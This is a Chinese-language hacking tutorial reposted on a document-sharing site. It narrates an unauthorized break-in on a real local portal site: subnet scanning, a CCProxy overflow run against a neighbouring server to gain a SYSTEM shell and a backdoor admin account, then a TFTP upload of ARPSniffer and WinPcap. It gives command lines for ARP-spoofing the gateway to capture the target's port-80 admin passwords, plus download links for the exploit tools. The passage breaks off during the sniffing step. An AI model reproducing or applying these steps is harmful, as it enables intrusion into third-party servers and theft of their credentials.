巧用窃听 玩“渗透”
上传者:刘非凡|上传时间:2015-05-10|密次下载
巧用窃听 玩“渗透”
网络安全渗透测试。
巧用窃听 玩“渗透”(图)
还记得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章吗?自从上次入侵之后,网站的管理员想尽了办法堵住了所有SQL注入漏洞,想通过SQL注入后台管理页面已经没有可能了。真是郁闷,但是转念一想,这正是一个练习技术的好机会,难道除了简单的工具利用外,我就没有其它的办法了吗?一定要想法子再次拿下这个站点。
还记得以前我利用小榕哥的WED+WIS入侵本地信息港的那篇文章吗?自从上次入侵之后,网站的管理员想尽了办法堵住了所有SQL注入漏洞,想通过SQL注入后台管理页面已经没有可能了。真是郁闷,但是转念一想,这正是一个练习技术的好机会,难道除了简单的工具利用外,我就没有其它的办法了吗?一定要想法子再次拿下这个站点。
一、扫描,突现新曙光
想来想去找不到什么好的办法,闲着也无事,于是习惯性的用X-scan扫描了一下与本地信息港(203.207.***.2)位于同一C段的IP地址。结果在扫描到的结果中发现有许多存活主机,而且其中有一些主机好像还有系统漏洞可以利用。唉,只可惜这些主机都不是我要进攻的目标!
面对扫描出来的结果发了好久的呆,突然大脑中灵光一闪冒出了一个念头:这些网站中说不定有某个与信息港位于同一个交换机内呢!如果我能进入控制与信息港位于同一交换机下的站点,就可以利用小榕哥的另外一个工具ARPSniffer.EXE,监听信息港站点中的一举一动,如果能嗅探到通过80端口传输到信息港的网站管理员密码,不就成功地搞定信息港了吗?看来方案可行!于是我开始了又一轮攻击。
二、利用溢出漏洞拿下第一站
在扫描到的C段IP地址中试验了几个站点,第一个站点居然还有SA空口令的漏洞,可惜连接上去后发现与信息港并不在同一个交换机下。另一个站点存在Serv-U溢出漏洞,可惜也无法利用。剩下的其它网站好像看不出有什么问题来,只有一个网站(203.207.***.44)有些奇怪,在端口扫描结果中发现它好像开放了“TCP 808”端口。也不知道这个奇怪的端口是拿来做什么的(如图1)? 图1
网络安全渗透测试。
内容需要下载文档才能查看
于是上Google搜索了一下,呵呵,这下收获可大了!从搜索结果了解到,原来808端口是网站中一个叫作CCProxy的软件打开的。CCProxy是国内一个常用的代理服务器软件,它可以轻松建立各种代理服务器,国内的许多企业都使用它代理上网,记得当初我还用它将一台肉鸡建成了一个全能的代理服务器,怎么就给忘记了呢?恰巧被扫描的网站也是一个企业站点,看来这个网站的808端口十有八九是CCProxy打开的啦。 最重要的是从网上还了解到这个CCProxy代理服务器软件刚发现了一个最新的远程漏洞,于是赶紧下载了一个溢出程序试试(下载地址:ttp://http://wendang.chazidian.com/down/soft/CCProxy.rar)。
(小提示:CCProxy打开的端口可能还有1080、2121等,这些是用来提供Socks和FTP服务的。)
CCProxy溢出程序的使用非常简单,在命令窗口中输入“ccpx 目标IP地址 端口”,然后按提示操作即可(如图2)。在溢出中会询问本机是与攻击目标位于同一个IP段;如果是在同一IP地址段中的话,直接按“y”,就可以开始溢出了;如果本机与攻击目标不在一个IP地址段中的话,按下“n”,溢出程序将继续提示并询问本机是否有一个公网IP地址(如图3),如果没有的话,还需要手工输入自己的网关IP地址才可以开始溢出。溢出成功后,会在当前命令窗口中自动连接攻击目标的24876端口,获得远程主机的一个SYSTEM Shell。剩下来的事就是建立管理员帐号,常常的掌握这台肉机。
图2
网络安全渗透测试。
内容需要下载文档才能查看
图
内容需要下载文档才能查看3
三、上传窃听利器ARPSniffer
现在要通过手里的肉鸡入侵信息港了。首先还是要查看一下两个网站服务器是不是位于同一个交换机下。远程连接肉机,在肉鸡的CMD窗口中输入命令“tracert 攻击目标IP地址”,令人兴奋的是看到直接返回了目标IP地址(如图4),现在可以确定两台主机都在同一交换机下了,看来有戏啦!可以考虑用嗅探的方法从肉鸡上获取信息港的管理员密码或者其它有用的信息。
网络安全渗透测试。
现在要用到的是一个名叫“ARPSniffer.exe”的软件(下载地址:
http://wendang.chazidian.com/Soft/uploadsoft/200409/arpsniffer.rar)。这个软件有DOS版和WIN版,RPSniffer也是小榕哥开发的一款工具非常好的嗅探工具,它可以用在交换机的环境下。在使用这个窃听工具前首先要使用机器上安装WinPCAP驱动。怎么上传ARPSniffer到肉鸡上?还是老方法用TFTP传送。在本机上运行Tfpd32,将本机建成为一个TFTP服务器,点击界面中的“Browse”按钮,选择ARPSniffer下载压缩包的解压路径(如图5),然后在肉鸡的命令窗口中运行“Get -i TFTP服务器IP地址 文件名”即可。在这里下载后的压缩包中有两个版本的程序,我们只需要上传“arpsniffer.exe”和
“WinPcap_3_0_a.exe”即可。上传成功后先运行“WinPcap_3_0_a.exe”安装嗅探驱动程序。 图4
内容需要下载文档才能查看
图5
网络安全渗透测试。
内容需要下载文档才能查看
四、利用ARPSniffer渗透攻击真正目标
现在是万事具备,只欠嗅探。先在命令窗口中运行“Ipconfig /all”命令,查看一下肉鸡上的网址配置情况和网关IP地址(如图6)。可以查到网关(Default Gateway)为“203.207.***.1”,运行ARPSniffer命令:
“Arpsniffer 203.207.***.1 203.207.***.2 80 c:\password.txt”;
即可开始在肉鸡上监听攻击目标IP的80端口了(如图7)。攻击目标IP上所有通过80端口收发的密码将被保存在“Password.txt”文件中。在嗅探时需要注意,如果在肉鸡上安装有两块网卡的话,还要在刚才的Arpsniffer命令后加上数字参数指定嗅探的网卡ID。
图6
下载文档
热门试卷
- 2016年四川省内江市中考化学试卷
- 广西钦州市高新区2017届高三11月月考政治试卷
- 浙江省湖州市2016-2017学年高一上学期期中考试政治试卷
- 浙江省湖州市2016-2017学年高二上学期期中考试政治试卷
- 辽宁省铁岭市协作体2017届高三上学期第三次联考政治试卷
- 广西钦州市钦州港区2016-2017学年高二11月月考政治试卷
- 广西钦州市钦州港区2017届高三11月月考政治试卷
- 广西钦州市钦州港区2016-2017学年高一11月月考政治试卷
- 广西钦州市高新区2016-2017学年高二11月月考政治试卷
- 广西钦州市高新区2016-2017学年高一11月月考政治试卷
- 山东省滨州市三校2017届第一学期阶段测试初三英语试题
- 四川省成都七中2017届高三一诊模拟考试文科综合试卷
- 2017届普通高等学校招生全国统一考试模拟试题(附答案)
- 重庆市永川中学高2017级上期12月月考语文试题
- 江西宜春三中2017届高三第一学期第二次月考文科综合试题
- 内蒙古赤峰二中2017届高三上学期第三次月考英语试题
- 2017年六年级(上)数学期末考试卷
- 2017人教版小学英语三年级上期末笔试题
- 江苏省常州西藏民族中学2016-2017学年九年级思想品德第一学期第二次阶段测试试卷
- 重庆市九龙坡区七校2016-2017学年上期八年级素质测查(二)语文学科试题卷
- 江苏省无锡市钱桥中学2016年12月八年级语文阶段性测试卷
- 江苏省无锡市钱桥中学2016-2017学年七年级英语12月阶段检测试卷
- 山东省邹城市第八中学2016-2017学年八年级12月物理第4章试题(无答案)
- 【人教版】河北省2015-2016学年度九年级上期末语文试题卷(附答案)
- 四川省简阳市阳安中学2016年12月高二月考英语试卷
- 四川省成都龙泉中学高三上学期2016年12月月考试题文科综合能力测试
- 安徽省滁州中学2016—2017学年度第一学期12月月考高三英语试卷
- 山东省武城县第二中学2016.12高一年级上学期第二次月考历史试题(必修一第四、五单元)
- 福建省四地六校联考2016-2017学年上学期第三次月考高三化学试卷
- 甘肃省武威第二十三中学2016—2017学年度八年级第一学期12月月考生物试卷
网友关注
- 九项尺寸
- 24届计算机表演赛命题搜索答案之社科类
- 学院英文版学士学位证书副本申请表
- 2015银行校园招聘—笔试技巧行测部分(三)
- 统计业务知识(统计法1-4讲笔记)
- 食品科学与工程专业三基题库答案
- 2015执业护士资格考试模拟试卷(四)4专业实务
- 2015银行招聘考试时会用到的工具
- 南通市市属事业单位2015年上半年公开招聘工作人员教育教学理论笔试大纲.doc
- 过关宝典
- 试卷-B2
- 科目二坡道定点停车和起步的技巧
- 驾考
- 乒乓球
- 科目二侧方位停车教学技巧图解
- 十个规定动作理论考试培训题库
- 小型车直角转弯图解技巧教案
- 24届计算机表演赛命题搜索答案之数学类
- 关于做好2014年度小学幼儿园高级师
- IELTS考务须知
- 教师资格证个人承诺书
- 大方县2015年农村义务教育阶段学校教师特设岗位计划实施细则
- 科目二场地教学
- 朱教授讲朱子
- 考试重点1
- 毕节双山新区2015年农村义务教育阶段学校教师特设岗位计划招聘细则
- 24届计算机表演赛命题搜索答案之禁烟类
- 注册安全工程师
- 24届计算机表演赛命题搜索答案之成语典故
- 天使爱美丽改版计划
网友关注视频
- 苏科版数学七年级下册7.2《探索平行线的性质》
- 精品·同步课程 历史 八年级 上册 第15集 近代科学技术与思想文化
- 冀教版小学英语四年级下册Lesson2授课视频
- 人教版二年级下册数学
- 3.2 数学二年级下册第二单元 表内除法(一)整理和复习 李菲菲
- 外研版八年级英语下学期 Module3
- 二年级下册数学第三课 搭一搭⚖⚖
- 沪教版牛津小学英语(深圳用) 四年级下册 Unit 7
- 第19课 我喜欢的鸟_第一课时(二等奖)(人美杨永善版二年级下册)_T644386
- 沪教版八年级下册数学练习册21.3(3)分式方程P17
- 沪教版牛津小学英语(深圳用) 五年级下册 Unit 7
- 冀教版英语四年级下册第二课
- 沪教版八年级下册数学练习册21.4(1)无理方程P18
- 外研版英语三起6年级下册(14版)Module3 Unit1
- 【部编】人教版语文七年级下册《逢入京使》优质课教学视频+PPT课件+教案,安徽省
- 苏科版八年级数学下册7.2《统计图的选用》
- 沪教版牛津小学英语(深圳用) 四年级下册 Unit 4
- 【部编】人教版语文七年级下册《老山界》优质课教学视频+PPT课件+教案,安徽省
- 北师大版数学四年级下册第三单元第四节街心广场
- 沪教版八年级下次数学练习册21.4(2)无理方程P19
- 30.3 由不共线三点的坐标确定二次函数_第一课时(市一等奖)(冀教版九年级下册)_T144342
- 六年级英语下册上海牛津版教材讲解 U1单词
- 冀教版小学数学二年级下册第二单元《有余数除法的竖式计算》
- 第五单元 民族艺术的瑰宝_15. 多姿多彩的民族服饰_第二课时(市一等奖)(岭南版六年级上册)_T129830
- 第12章 圆锥曲线_12.7 抛物线的标准方程_第一课时(特等奖)(沪教版高二下册)_T274713
- 苏科版数学八年级下册9.2《中心对称和中心对称图形》
- 飞翔英语—冀教版(三起)英语三年级下册Lesson 2 Cats and Dogs
- 青岛版教材五年级下册第四单元(走进军营——方向与位置)用数对确定位置(一等奖)
- 外研版英语三起5年级下册(14版)Module3 Unit2
- 【获奖】科粤版初三九年级化学下册第七章7.3浓稀的表示
精品推荐
- 2016-2017学年高一语文人教版必修一+模块学业水平检测试题(含答案)
- 广西钦州市高新区2017届高三11月月考政治试卷
- 浙江省湖州市2016-2017学年高一上学期期中考试政治试卷
- 浙江省湖州市2016-2017学年高二上学期期中考试政治试卷
- 辽宁省铁岭市协作体2017届高三上学期第三次联考政治试卷
- 广西钦州市钦州港区2016-2017学年高二11月月考政治试卷
- 广西钦州市钦州港区2017届高三11月月考政治试卷
- 广西钦州市钦州港区2016-2017学年高一11月月考政治试卷
- 广西钦州市高新区2016-2017学年高二11月月考政治试卷
- 广西钦州市高新区2016-2017学年高一11月月考政治试卷
分类导航
- 互联网
- 电脑基础知识
- 计算机软件及应用
- 计算机硬件及网络
- 计算机应用/办公自动化
- .NET
- 数据结构与算法
- Java
- SEO
- C/C++资料
- linux/Unix相关
- 手机开发
- UML理论/建模
- 并行计算/云计算
- 嵌入式开发
- windows相关
- 软件工程
- 管理信息系统
- 开发文档
- 图形图像
- 网络与通信
- 网络信息安全
- 电子支付
- Labview
- matlab
- 网络资源
- Python
- Delphi/Perl
- 评测
- Flash/Flex
- CSS/Script
- 计算机原理
- PHP资料
- 数据挖掘与模式识别
- Web服务
- 数据库
- Visual Basic
- 电子商务
- 服务器
- 搜索引擎优化
- 存储
- 架构
- 行业软件
- 人工智能
- 计算机辅助设计
- 多媒体
- 软件测试
- 计算机硬件与维护
- 网站策划/UE
- 网页设计/UI
- 网吧管理